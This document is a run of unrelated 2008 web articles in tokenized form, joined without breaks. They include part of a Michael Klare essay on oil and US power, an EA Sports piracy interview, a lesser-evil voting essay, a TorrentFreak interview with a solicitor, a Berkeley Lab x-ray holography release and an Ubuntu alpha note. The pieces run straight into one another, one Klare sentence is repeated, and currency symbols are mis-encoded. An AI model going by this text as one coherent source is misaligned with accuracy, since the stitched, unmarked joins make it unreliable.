The fund has also made substantial investments in Advanced Micro Systems , a major chip maker , and the Carlyle Group , the private equity giant .
Another big SWF , the Kuwait Investment Authority , also acquired a multibillion - dollar stake in Citigroup , along with a $ 6.6 billion chunk of Merrill Lynch .
And these are but the first of a series of major SWF moves that will be aimed at acquiring stakes in top American banks and corporations .
The managers of these funds naturally insist that they have no intention of using their ownership of prime American properties to influence U.S. policy .
In time , however , a transfer of economic power of this magnitude cannot help but translate into a transfer of political power as well .
Indeed , this prospect has already stirred deep misgivings in Congress .
" In the short run , that they [ the Middle Eastern SWFs ] are investing here is good , " Senator Evan Bayh ( D - Indiana ) recently observed .
" But in the long run it is unsustainable .
Our power and authority is eroding because of the amounts we are sending abroad for energy .... "
No Summer Tax Holiday for the Pentagon Foreign ownership of key nodes of our economy is only one sign of fading American superpower status .
Oil 's impact on the military is another .
Every day , the average G.I. in Iraq uses approximately 27 gallons of petroleum - based fuels .
With some 160,000 American troops in Iraq , that amounts to 4.37 million gallons in daily oil usage , including gasoline for vans and light vehicles , diesel for trucks and armored vehicles , and aviation fuel for helicopters , drones , and fixed - wing aircraft .
With U.S. forces paying , as of late April , an average of $ 3.23 per gallon for these fuels , the Pentagon is already spending approximately $ 14 million per day on oil ( $ 98 million per week , $ 5.1 billion per year ) to stay in Iraq .
Meanwhile , our Iraqi allies , who are expected to receive a windfall of $ 70 billion this year from the rising price of their oil exports , charge their citizens $ 1.36 per gallon for gasoline .
When questioned about why Iraqis are paying almost a third less for oil than American forces in their country , senior Iraqi government officials scoff at any suggestion of impropriety .
" America has hardly even begun to repay its debt to Iraq , " said Abdul Basit , the head of Iraq 's Supreme Board of Audit , an independent body that oversees Iraqi governmental expenditures .
" This is an immoral request because we did n't ask them to come to Iraq , and before they came in 2003 we did n't have all these needs . "
Needless to say , this is not exactly the way grateful clients are supposed to address superpower patrons .
" It 's totally unacceptable to me that we are spending tens of billions of dollars on rebuilding Iraq while they are putting tens of billions of dollars in banks around the world from oil revenues , " said Senator Carl Levin ( D - Michigan ) , chairman of the Armed Services Committee .
" It does n't compute as far as I 'm concerned . "
Certainly , however , our allies in the region , especially the Sunni kingdoms of Kuwait , Saudi Arabia , and the United Arab Emirates ( UAE ) that presumably look to Washington to stabilize Iraq and curb the growing power of Shiite Iran , are willing to help the Pentagon out by supplying U.S. troops with free or deeply - discounted petroleum .
No such luck .
Except for some partially subsidized oil supplied by Kuwait , all oil - producing U.S. allies in the region charge us the market rate for petroleum .
Take that as a striking reflection of how little credence even countries whose ruling elites have traditionally looked to the U.S. for protection now attach to our supposed superpower status .
Think of this as a strikingly clear - eyed assessment of American power .
As far as they 're concerned , we 're now just another of those hopeless oil addicts driving a monster gas - guzzler up to the pump -- and they 're perfectly happy to collect our cash which they can then use to cherry - pick our prime assets .
So expect no summer tax holidays for the Pentagon , not in the Middle East , anyway .
Worse yet , the U.S. military will need even more oil for the future wars on which the Pentagon is now doing the planning .
In this way , the U.S. experience in Iraq has especially worrisome implications .
Under the military " transformation " initiated by Secretary of Defense Donald Rumsfeld in 2001 , the future U.S. war machine will rely less on " boots on the ground " and ever more on technology .
But technology entails an ever - greater requirement for oil , as the newer weapons sought by Rumsfeld ( and now Secretary of Defense Robert Gates ) all consume many times more fuel than those they will replace .
To put this in perspective :
The average G.I in Iraq now uses about seven times as much oil per day as G.I.s did in the first the Gulf War less than two decades ago .
And every sign indicates that the same ratio of increase will apply to coming conflicts ; that the daily cost of fighting will skyrocket ; and that the Pentagon 's capacity to shoulder multiple foreign military burdens will unravel .
Thus are superpowers undone .
Russia 's Gusher
If anything demonstrates the critical role of oil in determining the fate of superpowers in the current milieu , it is the spectacular reemergence of Russia as a Great Power on the basis of its superior energy balance .
Once derided as the humiliated , enfeebled loser in the U.S. - Soviet rivalry , Russia is again a force to be reckoned with in world affairs .
It possesses the fastest - growing economy among the G - 8 group of major industrial powers , is the world 's second leading producer of oil ( after Saudi Arabia ) , and its top producer of natural gas .
Because it produces far more energy than it consumes , Russia exports a substantial portion of its oil and gas to neighboring countries , making it the only Great Power not dependent on other states for its energy needs .
As Russia has become an energy - exporting state , it has moved from the list of has - beens to the front rank of major players .
When President Bush first occupied the White House , in February 2001 , one of his highest priorities was to downgrade U.S. ties with Russia and annul the various arms - control agreements that had been forged between the two countries by his predecessors , agreements that explicitly conferred equal status on the USA and the USSR .
As an indication of how contemptuously the Bush team viewed Russia at that time , Condoleezza Rice , while still an adviser to the Bush presidential campaign , wrote , in the January / February 2000 issue of the influential Foreign Affairs , " U.S. policy ... must recognize that American security is threatened less by Russia 's strength than by its weakness and incoherence . "
Under such circumstances , she continued , there was no need to preserve obsolete relics of the dual superpower past like the Anti-Ballistic Missile ( ABM )
Treaty ; rather , the focus of U.S. efforts should be on preventing the further erosion of Russian nuclear safeguards and the potential escape of nuclear materials .
In line with this outlook , President Bush believed that he could convert an impoverished and compliant Russia into a major source of oil and natural gas for the United States -- with American energy companies running the show .
This was the evident aim of the U.S. - Russian " energy dialogue " announced by Bush and Russian President Vladimir Putin in May 2002 .
But if Bush thought Russia was prepared to turn into a northern version of Kuwait , Saudi Arabia , or Venezuela prior to the arrival of Hugo Chávez , he was to be sorely disappointed .
Putin never permitted American firms to acquire substantial energy assets in Russia .
Instead , he presided over a major recentralization of state control when it came to the country 's most valuable oil and gas reserves , putting most of them in the hands of Gazprom , the state - controlled natural gas behemoth .
Once in control of these assets , moreover , Putin has used his renascent energy power to exert influence over states that were once part of the former Soviet Union , as well as those in Western Europe that rely on Russian oil and gas for a substantial share of their energy needs .
In the most extreme case , Moscow turned off the flow of natural gas to Ukraine on January 1 , 2006 , in the midst of an especially cold winter , in what was said to be a dispute over pricing but was widely viewed as punishment for Ukraine 's political drift westwards .
( The gas was turned back on four days later when Ukraine agreed to pay a higher price and offered other concessions . )
Gazprom has threatened similar action in disputes with Armenia , Belarus , and Georgia -- in each case forcing those former Soviet SSRs to back down .
When it comes to the U.S. - Russian relationship , just how much the balance of power has shifted was evident at the NATO summit at Bucharest in early April .
There , President Bush asked that Georgia and Ukraine both be approved for eventual membership in the alliance , only to find top U.S. allies ( and Russian energy users ) France and Germany blocking the measure out of concern for straining ties with Russia .
" It was a remarkable rejection of American policy in an alliance normally dominated by Washington , " Steven Erlanger and Steven Lee Myers of the New York Times reported , " and it sent a confusing signal to Russia , one that some countries considered close to appeasement of Moscow . "
For Russian officials , however , the restoration of their country 's great power status is not the product of deceit or bullying , but a natural consequence of being the world 's leading energy provider .
No one is more aware of this than Dmitri Medvedev , the former Chairman of Gazprom and new Russian president .
" The attitude toward Russia in the world is different now , " he declared on December 11 , 2007 .
" We are not being lectured like schoolchildren ; we are respected and we are deferred to .
Russia has reclaimed its proper place in the world community .
Russia has become a different country , stronger and more prosperous . "
As a result of our addiction to increasingly costly imported oil , we have become a different country , weaker and less prosperous .
The same , of course , can be said about the United States -- in reverse .
As a result of our addiction to increasingly costly imported oil , we have become a different country , weaker and less prosperous .
Whether we know it or not , the energy Berlin Wall has already fallen and the United States is an ex-superpower - in - the - making .
Michael Klare is a professor of peace and world security studies at Hampshire College and author of the just - released Rising Powers , Shrinking Planet : The New Geopolitics of Energy ( Metropolitan Books ) .
A documentary film based on his previous book , Blood and Oil , is available from the Media Education Foundation and can be ordered at bloodandoilmovie.com .
A brief video of Klare discussing key subjects in his new book can be viewed by clicking here .
Copyright 2008 Michael T. Klare
This article is republished in the Baltimore Chronicle with permission .
Additional edifying comments and links can be found here on the Tom Dispatch site .
Copyright © 2008 The Baltimore Chronicle .
All rights reserved .
Republication or redistribution of Baltimore Chronicle content is expressly prohibited without their prior written consent .
This story was published on May 8 , 2008 .
John Davis , a chemist in Bloomington , Ill. , knows about concrete .
For example , he knows that if you keep concrete vibrating it wo n’t set up before you can use it .
It will still pour like a liquid .
Now he has applied that knowledge to a seemingly unrelated problem thousands of miles away .
He figured out that devices that keep concrete vibrating can be adapted to keep oil in Alaskan storage tanks from freezing .
The Oil Spill Recovery Institute of Cordova , Alaska , paid him $ 20,000 for his idea .
The chemist and the institute came together through InnoCentive , a company that links organizations ( seekers ) with problems ( challenges ) to people all over the world ( solvers ) who win cash prizes for resolving them .
The company gets a posting fee and , if the problem is solved , a “ finders fee ” equal to about 40 percent of the prize .
The process , according to John Seely Brown , a theorist of information technology and former director of the Xerox Palo Alto Research Center , reflects “ a huge shift in popular culture , from consuming to participating ” enabled by the interactivity so characteristic of the Internet .
It is sometimes called open - source science , taking the name from open - source software in which the source code , or original programming , is made public to encourage others to work on improving it .
EA Sports boss Peter Moore has said he does n't support the move to sue consumers for illegal downloading - warning , " It did n't work for the music industry . "
Moore was speaking to Eurogamer at the Leipzig Games Convention , following the announcement that five games companies are taking legal action against 25,000 file - sharing internet users .
" I'm not a huge fan of trying to punish your consumer , " he said .
" Albeit these people have clearly stolen intellectual property , I think there are better ways of resolving this within our power as developers and publishers .
" Yes , we 've got to find solutions , " Moore continued .
" We absolutely should crack down on piracy .
People put a lot of blood , sweat and tears into their content and deserve to get paid for it .
It 's absolutely wrong , it is stealing .
" But at the same time I think there are better solutions than chasing people for money .
I 'm not sure what they are , other than to build game experiences that make it more difficult for there to be any value in pirating games . "
According to Moore , there are lessons to be learned from the experiences of other industries .
" If we learned anything from the music business , they just do n't win any friends by suing their consumers , " he observed .
" Speaking personally , I think our industry does not want to fall foul of what happened with music . "
When asked whether EA has any plans to go down the same road as Atari , Codemasters and the other publishers launching the legal action , Moore replied , " Not as far as I 'm aware .
Regarding what EA needs to do - I can't comment on that .
EA takes piracy very seriously , and people deserve to get paid for content they create .
" But as far as I 'm aware , we have no plans , that I know of , to partner with Atari and Codemasters and chase down consumers , " he added .
To read the full interview with Moore , where he discusses EA , E3 and the console race , visit Eurogamer.net .
As promised in my pre­vi­ous post ( 10 Brain Train­ing Tips To Teach and Learn ) , here are some of the resources that inform my under­stand­ing of the brain : books , con­fer­ences , and web­sites .
BOOKS
There are a mul­ti­tude of books about the brain .
For edu­ca­tors , the best of these are books that demys­ti­fy the lan­guage of neu­ro­science while pro­vid­ing infor­ma­tion applic­a­ble to the teaching / learning process .
Among the more pro­lif­ic or well - known authors of this type include Jeb Schenck , Robert Syl­west­er , Bar­bara Givens , Robert Marzano , Mar­ilee Sprenger , and Eric Jensen .
I have found books by Sprenger and Jensen to be immense­ly help­ful .
Both write about the brain in under­stand­able terms , pro­vide prac­ti­cal sug­ges­tions , dis­cuss sen­si­ble ideas , and include innu­mer­able ref­er­ences to sup­port­ive research .
Three of my most ref­er­enced books by these two are :
CONFERENCES
A high­ly stim­u­lat­ing and infor­ma­tive expe­ri­ence is the 3 ‑day Learn­ing & the Brain con­fer­ence , which takes place three times a year .
In the fall and spring it is held in Cam­bridge , MA , and in the win­ter it takes place in Cal­i­for­nia .
Each con­fer­ence has an over­ar­ch­ing theme , which is then bro­ken down into six strands .
In the past these strands have focused on pre‑K through col­lege ; the April 2008 con­fer­ence ush­ered in addi­tion of an adult brain strand .
The L&B con­fer­ence runs the gamut from renowned neu­ro­sci­en­tists shar­ing their research to prac­ti­tion­ers trans­lat­ing that research into prac­ti­cal appli­ca­tion .
There are pre- and post - con­fer­ence work­shops , and plen­ty of oppor­tu­ni­ty to meet and talk with all pre­sen­ters , as well as con­fer­ence atten­dees .
I have attend­ed three times in four years , antic­i­pate attend­ing both Cam­bridge con­fer­ences this com­ing school year , and hope one day to attend the Cal­i­for­nia con­fer­ence just for the fun of it !
WEBSITES
Web­sites pro­vide infor­ma­tion in a vari­ety of modal­i­ties .
Many of these sites can be used with stu­dents , who enjoy learn­ing about their brains , and hence , about them­selves .
Sleep
Nutri­tion
Move­ment and Exer­cise
Emo­tions
I hope you find these resources use­ful .
The next arti­cle in the series will cov­er some Help­ful Facts Teach­ers Should Know About Their Own Brains … so stay tuned .
Lau­rie Bar­tels writes the Neu­rons Fir­ing blog to cre­ate for her­self the “ the grad­u­ate course I ’d love to take if it exist­ed as a pro­gram ” .
She is the K‑8 Com­put­er Coor­di­na­tor and Tech­nol­o­gy Train­ing Coor­di­na­tor at Rye Coun­try Day School in Rye , New York .
She is also the orga­niz­er of Dig­i­tal Wave annu­al sum­mer pro­fes­sion­al devel­op­ment , and a fre­quent attendee of Learn­ing & The Brain con­fer­ences .
Elections as the ultimatum game August 23 , 2008
In large groups which rely on elections of delegates , it is often the case that the field of candidates ( or at least the field of “ credible ” candidates ) represents a narrow set of policy options .
In such a situation , many voters have the option of voting for the credible candidate whom they least disfavor , an act known at lesser - evil voting , or abstaining [ 1 ] .
The discussion regarding the preferred choice of action in this case can become quite emotional and vitriolic .
One argument against lesser - evil voting is moral .
This point of view holds voting as expressing the political views of the voter .
Thus , voting for a candidate who does not represent the voter ’s views is considered wrong ( immoral , anti-democratic , mendacious ) .
I am going to dismiss this argument .
In my view , voting is not an action with inherent moral value – it should not be seen as a direct expression of beliefs , but as a political tool .
Voting ( or not voting ) is one tool of political action that is available to members of certain groups .
Those members are morally bound to use that tool ( like any other political tool ) to shape the policies of the group for good .
The question is , therefore , which course of action is most likely to produce good results : lesser - evil voting or abstaining ?
The argument advanced by the promoters of lesser - evil voting is straightforward .
While the range of policy options represented by the credible candidates is narrow , it is not non-existent : some candidates are better than others – and one of them is the best .
Voting for that candidate increases the chance that that candidate is elected , and thus increases the chance that good , or at least better , public policy is be implemented during the upcoming term of office .
This argument is sometimes countered by opponents of lesser - evil voting by denying there are any significant differences between the credible candidates ( e.g. , Ralph Nader famously referring to the Democratic and Republican parties as tweedledee and tweedledum ) .
Factually , this is a weak argument – narrow as the range of policies promoted by candidates may be , there are often significant implications to the differences within that narrow range .
This , therefore , allows supporters of lesser - evil voting to portray all their opponents as all - or - nothing purists .
There is , however , a pragmatic reason for avoiding lesser - evil voting .
This reason is not an over - riding argument which negates the validity of the argument for lesser - evil , but it indicates that an equilibrium between opposing objectives must be reached , and thus lesser - evil voting should be assessed on a case - by - case basis rather than adopted as a blanket policy .
As a corollary , disagreements as to whether lesser - evil voting should be used in a particular election should be discussed by comparing the strengths of the opposing forces , rather than by applying corrosive moral or ad - hominem terms .
The pragmatic reason for abstaining becomes apparent by drawing an analogy between the elections setup and repeated rounds of the Ultimatum game .
In the analogy , the lesser - evil politician ( or to be more exact , the system that brings that politician to the position of a credible candidate ) plays the role of the first player .
He sets an ultimatum by presenting his policies ( as well as past deeds and personality ) .
The set of voters attracted to him ( i.e. , those voters who find him as the lesser - evil candidate ) is the second player – they can either vote for him , accepting the political package offered , or reject it by abstaining .
In the latter case , both the politician ( his supporting , nominating system ) and the set of voters attracted to him lose .
Seeing elections in this way , the argument for abstaining is clear : the threat of abstention exists in the mind of the politician ( or his nominating system ) , prodding him to present a political package that is more pleasant to the voters .
It is thus rational for voters to abstain in some cases , even under the extreme assumption that the ultimatum is completely rigid – i.e. , that political package associated with a candidate is completely fixed in advance .
In reality , of course , the threat of abstention can change both the positions presented before the elections and the policies pursued after the elections ( the latter , through the threat of abstention in subsequent elections ) – making the threat of abstention even more effective than in the theoretical ultimatum game .
Accepting this view does not resolve the practical question of whether to abstain or to use lesser - evil voting at any specific election .
Doing so would involve a speculative analysis of the effects of each of the two possible courses of action .
Any result of such an analysis would necessarily be subjective and uncertain .
Holding a strong view one way or the other on this matter seems , therefore , unjustified .
[ 1 ] Voting for a non-credible candidate is , as far as the elections results are concerned , the same as abstaining .
It does have the added effect of signaling the true preference of the voter , but that purpose can be achieved in other ways , and does not affect the results of the elections .
Sen .
John McCain get heckled during an economic speech to the National small business council in Washington D.C
In Sucks - Rules - O- Meter Value Comparison , a couple days ago , I mentioned a program I wrote that translated values collected for Sucks - Rules - O - Meters into sucks / rules quotients that are more easily compared .
Today , I refactored the program a touch and added in a linear function along with the decelerating curve function that meter.rb previously used .
Now , the linear function that ranks list items from 0.00 to 10.00 is the default , and the decelerating curve from - inf ( negative infinity ) to 10.00 is used when you use the -t d option .
I created a test file called test. meter .
It contains :
high , 50,100 highest , 0,100 low , 100,50 lowest , 100,0 middlest , 50,50
The output of meter.rb test. meter using the new algorithm looks like this :
highest : 10.00 high : 7.50 middlest : 5.00 low : 2.50 lowest : 0.00
The output of meter.rb -t d test . meter looks like this :
highest : 10.00 high : 9.50 middlest : 9.00 low : 8.00 lowest : - inf
The output of meter -- help looks like this :
Usage : meter [ options ] -t , --type=OUT_TYPE
Specify the type of output you want .
At this time , the only option that has been implemented is ' d ' , which indicates a decelerating curve function whose maximum output value is 10.00 .
If the ' - t ' option is not specified , the default of a linear function whose output value ranges between 0.00 and 10.00 is used .
The source code of the current version of the program is stored at meter.rb. txt .
For more information on some of what ’s in the program — in particular , what can be done with the path variable — see Sucks - Rules - O - Meter Value Comparison .
Prompted by Sterling in comments , I realized I needed to add the output of meter.rb using the new algorithm , with the Operating System Sucks - Rules - O - Meter data as input .
I ’m using the data from two days ago , though , because I ’m too lazy to check whether the numbers have changed at all since then .
So , here ’s the output :
VMS : 9.96 FreeBSD : 9.72 MacOS X : 9.42 NetBSD : 8.74 OS /2 : 8.48 MVS : 7.94 Unix : 7.82 AmigaOS : 7.16 Linux : 6.50 Solaris : 5.07 OS/400 : 5.00 NetWare : 3.73 BeOS : 3.58 MacOS Classic : 1.51 OpenBSD : 1.00 Windows : 0.82
Did I forget to mention anything else ?
Over the last year , UK residents accused of sharing games like Dream Pinball have been threatened by lawyers Davenport Lyons .
Stuck in a trap of not having enough money to defend themselves , many choose to pay compensation demands - guilty or not - fearful of a much bigger punishment if things go bad .
Now a UK IP lawyer says he will defend as many people as he can - for free .
Last week , thousands of news outlets reported that a single mother , Isabella Barwinska from London , had been found guilty of uploading the game Dream Pinball .
She collected a staggering Â£ 16,000 bill for her trouble .
However , following a TorrentFreak report last week where we revealed that far from being a ‘ landmark ruling ’ , Miss Barwinska actually mounted no defense , people are realizing that all may not be as it seems .
Maybe it ’s possible to fight back – and win .
The timing could n’t be better
According to reports , any minute now lawyers Davenport Lyons will send out up to 25,000 further ‘ pay up or get sued ’ letters , demanding around Â£ 300 in compensation on the back of their so - called ‘ landmark ruling ’ .
Unfortunately , those accused of infringement have had limited choices up to now .
Pay around Â £ 200 - Â£ 250 for a few minutes with a lawyer and maybe get him to send a solitary letter , or go it alone , maybe with limited help from the UK ’s Citizens Advice service .
Either way , it ’s pretty much guaranteed to cost more than Â£ 300 , in time and / or money .
Until now .
Michael Coyle is a Solicitor Advocate , which means he is entitled to represent clients in the High Court and has frequently done so .
He is also a Director at his company Lawdit Solicitors and leads the company ’s Commercial and Intellectual Property legal section .
He ’s says he ’d like to help those file - sharers wrongly accused , so we caught up with him to find out more .
TF : Please introduce yourself Michael , and tell us about your company .
What do you specialize in ?
MC : Lawdit Solicitors was formed on 3 September 2001 by me , Michael Coyle .
Almost seven years later we are a busy commercial law firm with close connections in Marbella and Rome .
Lawdit ’s team consists of five Solicitors and support staff .
While Lawdit is a commercial law firm a large part of its client base is concerned with intellectual property and copyright of course .
TF : What inspired you to start the firm ?
MC : I wanted a law firm which was fair and would not price anyone out of securing at the very least a right of response when either the client ’s intellectual property has been infringed or they are defending a claim for intellectual property infringement .
TF : Please tell us a little about Lawdit ’s track record , relevant to this matter .
MC : Over the years I have advised clients in many aspects of copyright infringement from both perspectives , i.e the rights holder and the copier .
In relation to P2P there is a paucity of legal case law largely due to lack of funds and the lack of defences .
We have advised a retired gentleman and a 14 year old child , both threatened with lawsuits and both issues seem to have gone away .
TF : Why do you think they have gone away ?
MC : It may be because the rights holder does not wish to take the case further as they now know legal representation is in place or they do not want the publicity .
We will never know .
Litigation can often be described as a game of poker .
You have to always show a willingness to commence a legal action even if this is not your intention .
At the same time you always need to show you will defend .
At the time its usual for a ‘ without prejudice ’ exchange of correspondence to be maintained .
TF : Let us know what first got you interested in these Davenport Lyons cases .
MC : I have some clients who watch with interest all these developments and either they let me know or we are generally very good at keeping in touch with copyright laws
TF : What is your opinion of the ‘ settle up now or we sue ’ letters ?
MC : It can make sense to ‘ settle up now ’ if you have no defence to the claim and are almost certainly going to lose .
It ’s back to the poker game analogy .
Will they sue ?
etc .
It seems they will commence legal action as the recent case shows , however I would need to know more about each case .
If there is no defence and you are sure that a claim will follow then perhaps a penalty is worth paying .
If they have no defence and it is a case of ‘its not me guv’ then perhaps not .
If you have a valid defence then you should fight it .
TF : What is your opinion on how these ‘ default judgment ’ cases have been selected and prosecuted and the blanket media coverage of a ‘ landmark case ’ ?
MC : The individual would have ample opportunity to deal with numerous letters from the Lawyers .
Equally once a claim has been issued the defendant has over a month in many instances to provide a defence .
So the individual really ought to deal with it as the ostrich approach is not helpful .
Lawyers will generally want to shout about their success and I am no different .
A default Judgement is still a win although a fairly one sided win !
TF : So what exactly are you and Lawdit offering ?
MC : I think it ’s important that individuals do have a voice in this matter .
There will be some defendants who are infringing copyright with their use of the P2P software .
But at the same time there will be others who may not be .
I am willing to offer Lawdit Solicitors services as the law firm to represent these individuals .
I will do so for free .
Obviously we are a small firm and there may be limitations to this offer .
That is 5 offers for help will not be a problem .
5000 may pose me a problem , but yes , we ’re willing to be on the end of an email for sure .
TF : How would you like people to contact you , bearing in mind that at the moment there are a few hundred people receiving demands and this may increase to tens of thousands shortly , or so they say …..
MC : Email is best .
I am often in court but the Blackberry is on and happy to help as much as I can email is michael.coyle[at]lawdit.co.uk .
TF : Thank you for your time .
Readers contacting Michael are strongly advised to be very clear and concise in their initial correspondence .
A lot of people will be interested in this offer and Michael and his team are a limited resource .
Make their job as easy as you possibly can , so they can help more effectively .
Update : Already Michael is reaching capacity .
If any other law firms wish to step up to get involved , please contact us here .
August 1 , 2008
The Brightest , Sharpest , Fastest X - Ray Holograms Yet
Contact : Paul Preuss , ( 510 ) 486-6249
BERKELEY , CA –
The pinhole camera , a technique known since ancient times , has inspired a futuristic technology for lensless , three - dimensional imaging .
Working at both the Advanced Light Source ( ALS ) at the U.S. Department of Energy ’s Lawrence Berkeley National Laboratory , and at FLASH , the free - electron laser in Hamburg , Germany , an international group of scientists has produced two of the brightest , sharpest x-ray holograms of microscopic objects ever made , thousands of times more efficiently than previous x-ray - holographic methods .
A coherent x-ray beam illuminates both the sample and a uniformly redundant array ( URA ) placed next to it .
The CCD detector ( whose center is shielded from the direct beam ) collects diffracted x-rays from both sample and URA .
Processing the resulting interference patterns subsequently yields a hologram .
The x-ray hologram made at ALS beamline 9.0.1 was of Leonardo da Vinci ’s famous drawing , “ Vitruvian Man , ” a lithographic reproduction less than two micrometers ( millionths of a meter , or microns ) square , etched with an electron - beam nanowriter .
The hologram required a five - second exposure and had a resolution of 50 nanometers ( billionths of a meter ) .
The other hologram , made at FLASH , was of a single bacterium , Spiroplasma milliferum , made at 150 - nanometer resolution and computer - refined to 75 nanometers , but requiring an exposure to the beam of just 15 femtoseconds ( quadrillionths of a second ) .
The values for these two holograms are among the best ever reported for micron - sized objects .
With already established technologies , resolutions obtained by these methods could be pushed to only a few nanometers , or , using computer refinement , even better .
The researchers were from Berkeley Lab ; Lawrence Livermore National Laboratory ; the Stanford Linear Accelerator Center ; Uppsala University , Sweden ; the University of Hamburg and the Deutsches Elektronen - Synchrotron ( DESY ) , Germany ; Arizona State University ; Princeton University ; and the University of California at Berkeley .
Their results appear in advanced online publication of Nature Photonics , available online to subscribers at http://dx.doi.org/doi:10.1038/nphoton.2008.154.
The modern pinhole camera
“ Our purpose was to explore methods of making images of nanoscale objects on the time scale of atomic motions , a length and time regime that promises to become accessible with advances in free - electron lasers , ” says Stefano Marchesini of the ALS , who led the research .
“ The technique we used is called massively parallel x-ray Fourier - transform holography , with ‘ coded apertures . ’
What inspired me to try this approach was the pinhole camera . ”
The ancient Greeks made note of pinhole - camera effects without understanding them ; later , pinhole cameras were used by Chinese , Arab , and European scholars .
Renaissance painters learned the principals of perspective using the camera obscura , literally a “ dark room , ” with a pinhole in one wall that projected the outside scene onto the opposite wall .
“ The room had to be dark for the good reason that a sharp image requires a small pinhole , but a small pinhole also produces a dim image , ” says Marchesini .
“ To get a brighter image without lenses you have to use many pinholes .
The problem then becomes how to assemble the information , including depth information , from the overlapping shadow images .
This is where ‘ coded apertures ’ come in . ”
By knowing the precise layout of a pinhole array , including the different sizes of the different pinholes , a computer can recover a bright , high - resolution image numerically .
Random pinhole arrays were first used in x-ray astronomy but soon evolved into regular rows and columns of tiny square apertures of varying dimension .
These coded apertures are called uniformly redundant arrays , or URAs .
Marchesini knew that colleagues at Livermore were using URAs in gamma-ray detectors .
He asked himself , “ What would happen if we put a URA right next to an object we were imaging with the x-ray beamline ?
It should allow us to create a holographic image – one with orders of magnitude more intensity than a standard hologram . ”
Holography with x-rays
Holography was invented over 60 years ago by the physicist Dennis Gabor , but its use has long been limited by technology .
Whereas a pinhole camera employs ray optics , in which the photons travel like a stream of particles , holography depends on the wave - like properties of light .
The principle is straightforward : a beam of light illuminates an object , which scatters the light onto a detector such as a photographic plate .
Meanwhile a second , identical beam of light shines directly on the detector .
The scattered light waves from the object beam form interference patterns with the unscattered light waves from the reference beam .
This interference pattern serves to reconstruct an image of the object .
One easy way to do so , if the detector is a photo transparency , is for the observer to look through the transparency in the direction of the ( now absent ) object ; if only the reference beam is shining on the detector , the interference pattern serves to “ unscatter ” ( diffract ) the wavefront and reconstruct the object ’s image .
Lasers , which produce coherent light ( all the same phase ) were the first invention that made holography practical ; it is now possible to make small holograms using just a laser pointer .
FLASH is a powerful free - electron laser ( FEL ) ; a new generation of FELs of much shorter wavelength will be capable of producing coherent light pulses so short they ’ll be able to freeze atomic motion in the midst of chemical reactions .
Soft x-rays like those from ALS beamline 9.0.1 can also be made coherent , or laser - like , using a pair of pinholes .
( The beam is conditioned by these pinholes , but they are not directly involved in imaging , except to make the beam laser - like . )
To make a hologram , the beam issuing from the synchrotron scatters from the target object and is collected on a CCD detector .
Meanwhile the same beam simultaneously passes through the multiple - “ pinhole ” URA , mounted on the same plate as the target object , and produces a bright reference beam .
Top : the ALS beamline 9.0.1 experiment used a uniformly redundant array ( URA ) 30 nanometers thick with scattering elements 44 nanometers square ( left ) .
At right is the lithograph of Da Vinci�s Vitruvian Man .
The scale bar is two micrometers long .
Bottom : the FLASH experiment used a URA with 162 pinholes , next to a Spiroplasma bacterium .
The 150 - nanometer diameter pinholes in the URA limited resolution , but computer processing improved image resolution to 75 nanometers .
The scale bar is four micrometers long .
The scattered image of the object and the many overlapping reference beams from the URA combine to make an interference pattern which contains all the information , including the relative depth of individual features , needed to mathematically reconstruct a three - dimensional image of the object .
The hologram of the Spiroplasma bacterium was made in precisely the same way , with much brighter x-ray beams and a much shorter pulse of light .
So bright was the flash of light that the sample was vaporized , but not before both the scattered object beam and the reference beams from the URA had been recorded .
Together , the two experiments demonstrate that holographic x-ray images with nanometer - scale resolution can be made of objects measured in microns , in times as brief as femtoseconds .
Moreover , sample preparation time is fast and easily repeated for high throughput during repetitive experiments .
As the researchers write in their Nature Photonics article , “ Imaging with coherent x-rays will be a key technique for developing nanoscience and nanotechnology , and massively parallel holography will be an enabling tool in this quest . ”
“ Massively parallel x- ray holography , ” by Stefano Marchesini , Sébastien Boutet , Anne E. Sakdinawat , Michael J. Bogan , Sǎsa Bajt , Anton Barty , Henry N. Chapman , Matthias Frank , Stefan P. Hau -Riege , Abraham Szöke , Congwu Cui , David Shapiro , Malcolm Howells , John Spence , Joshua Shaevitz , Joanna Lee , Janos Hajdu , and Marvin M. Siebert , appears in advanced online publication of Nature Photonics and is available online to subscribers at http://dx.doi.org/doi:10.1038/nphoton.2008.154.
This work was supported by grants from the U.S. Department of Energy , the European Union , the Swedish Research Councils , the Munich Centre for Advanced Photonics , the Natural Sciences and Engineering Research Council of Canada , and the Sven and Lilly Lawskis Foundation .
Berkeley Lab is a U.S. Department of Energy national laboratory located in Berkeley , California .
It conducts unclassified scientific research and is managed by the University of California .
Visit our website at http://www.lbl.gov.
More Press Releases
Campaigning -- as all - consuming as it can be -- is easy .
Governing is hard .
Just ask Arnold Schwarzenegger .
The California governor -- unlike many fellow Republicans of a moderate ilk -- not only planned to attend the GOP national convention in Minneapolis / St .
Paul , he was slated for a high - profile speaking spot Monday night .
Not now .
As he had said he would do , if necessary , Schwarzenegger has canceled his trip because of the continuing stalemate over passing a state budget on Sacramento ( the spending plan is two months overdue ) .
Appropriately , given the acting background they share , Fred Thompson will take Schwarzenegger 's role .
Indeed , a Schwarzenegger aide told The Times ' Michael Rothfeld that Thompson will give the same speech ( but with a markedly different accent ) that the governor was going to give .
It traces John McCain 's life story , including his time as a prisoner of war .
Given their contrasting styles , we suspect Thompson will go ahead and make some alterations .
[ UPDATE : The Schwarzenegger people now tell Rothfield that the speech will have the same " storyline , " but will be reworked with Thompson 's cadence in mind . ]
Meanwhile , McCain and his staff can only hope that for former Tennessee senator can muster a bit more zest for this assignment than he often displayed in his failed bid for his party 's presidential nomination .
-- Don Frederick
Photo credit : AFP / Getty Images
The first alpha release of Ubuntu 8.10 , codenamed Intrepid Ibex , was made available on Saturday .
This preliminary Intrepid prerelease includes updated packages , a new version of the Linux kernel , and an experimental new visual style .
Ubuntu adheres to a time - based release cycle and puts out a new major release every six months .
Development of a new version begins soon after each major release .
The first stage of the Ubuntu development cycle , which is now complete for Intrepid , is planning the roadmap and merging in updated packages from upstream Debain .
A close look at the roadmap and blueprints reveals a modest but promising assortment of planned features for Ubuntu 8.10 .
Some of the most interesting plans relate to Canonical 's strategy for bringing Ubuntu to subnotebook portable computers and mobile Internet devices .
We recently looked at some of the early pieces of Ubuntu 's upcoming Netbook Remix , which is optimized specifically for devices with Intel 's Atom processor .
The Netbook Remix user interface is shaping up nicely , and now the Ubuntu developers are moving to the next level by focusing on bringing some important improvements to the underlying platform that will make Intrepid a stronger contender in the ultramobile space .
